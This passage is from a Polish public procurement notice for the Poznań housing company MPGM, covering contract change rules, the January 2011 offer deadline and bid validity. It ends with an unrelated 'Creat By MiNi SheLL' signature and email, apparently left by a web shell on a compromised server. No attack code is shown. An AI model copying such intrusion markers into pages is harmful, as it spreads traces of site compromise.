5.Możliwość dokonania zmian na wskutek  zdarzenia niezależnego od Zamawiającego np. decyzji organu administracji, orzeczenia sądowego, bezpośrednio wpływającego na przedmiot zamówienia, w zakresie objętym decyzją lub orzeczeniem sądu;
6.Możliwość dokonania zmian ceny umowy w przypadku zmiany wysokości obowiązującej stawki podatku  VAT.
7.Zgodnie z treścią art. 144 ust.1 ustawy Pzp, Zamawiający dopuszcza dokonywanie zmian nieistotnych;
8.Wszelkie zmiany zawarte w pkt. 1 - 7 niniejszej IDW wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mpgm.poznan.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejskie Przedsiębiorstwo Gospodarki Mieszkaniowej S.A., ul. Rybaki 18a, 61-884 Poznań, pokój 230.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.01.2011 godzina 10:00, miejsce: Miejskie Przedsiębiorstwo Gospodarki Mieszkaniowej S.A., ul. Rybaki 18a, 61-884 Poznań, pokój 230.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com